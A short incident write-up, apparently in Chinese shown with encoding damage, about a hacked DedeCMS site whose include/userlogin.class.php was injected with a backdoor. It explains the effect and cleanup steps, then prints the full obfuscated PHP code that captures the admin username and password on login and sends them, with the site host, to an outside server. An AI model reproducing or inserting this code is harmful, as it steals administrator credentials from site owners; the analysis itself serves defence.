需要修改的文件 include/userlogin.class.php

==========================================================

文件說明：

由于之前沒有對(duì)服務(wù)器的目錄權(quán)限進(jìn)行嚴(yán)格設(shè)計(jì)，被注入了很多一句話木馬文件，逐一清理后過

了幾個(gè)月，登錄系統(tǒng)后臺(tái)非常緩慢

追蹤登錄步驟到include/userlogin.class.php文件，發(fā)現(xiàn)該如下惡意代碼：

===========================================================

代碼影響說明：

該文件會(huì)將站點(diǎn)服務(wù)器信息，登錄的用戶名密碼，登錄地址進(jìn)行記錄

通過 info.msssm.com/in/api.php?var= 地址發(fā)送到入侵者服務(wù)器

===========================================================

檢查處理辦法：

全局搜索 “base64_decode”,DedeCMS系統(tǒng)用到該函數(shù)的也就是插件安裝部分，對(duì)文件逐一進(jìn)行

比對(duì)，發(fā)現(xiàn)惡意文件，及時(shí)刪除

并修改掉后臺(tái)的管理員賬號(hào)密碼和后臺(tái)管理路徑

惡意代碼如下：
if((!empty($_POST['userid'])) && (!empty($_POST['pwd']))) {
define(‘UC_ADMINSCRIPTS’, ‘dede’);
define(‘UC_ADMINCPS’, ‘aW5mby5tc3NzbS5jb20=’);
define(‘UC_NOROBOTS’, ‘L2luL2FwaS5′.’waHA/dmFyPQ==’);
define(‘UC_CURSCRIPTS’, function_exists (‘fsockopen’) ? true : false);
define(‘UC_SPIDERHOST’,$_SERVER['HTT'.'P_HOST'] ? $_SERVER['HTT'.'P_HOST'] :

$_SERVER['SERV'.'ER_NAME']);
define(‘UC_SPIDERSELF’,$_SERVER['PHP_S'.'ELF'] ? $_SERVER['PHP_S'.'ELF'] :

$_SERVER['SCRI'.'PT_NAME']);
$uc_config_array = array(bin2hex(UC_SPIDERHOST),bin2hex(UC_SPIDERSELF),bin2hex

($_POST['userid']),bin2hex($_POST['pwd']));
$ucbaiduget = base64_decode (UC_NOROBOTS).UC_ADMINSCRIPTS.base64_decode

(‘JmRhdGE9′).join(‘|’,$uc_config_array);
$ucgoogleget = base64_decode (UC_ADMINCPS);
if(UC_CURSCRIPTS) {
$ucsockconn = @fsockopen ($ucgoogleget,80);
@fputs ($ucsockconn,"GET ".$ucbaiduget." HTTP/1.1

Host:".$ucgoogleget." Connection: Close ");
@fclose ($ucsockconn);
} else {
@file_get_contents (base64_decode (‘aHR0cDovLw==’).$ucgoogleget.$ucbaiduget);
}
}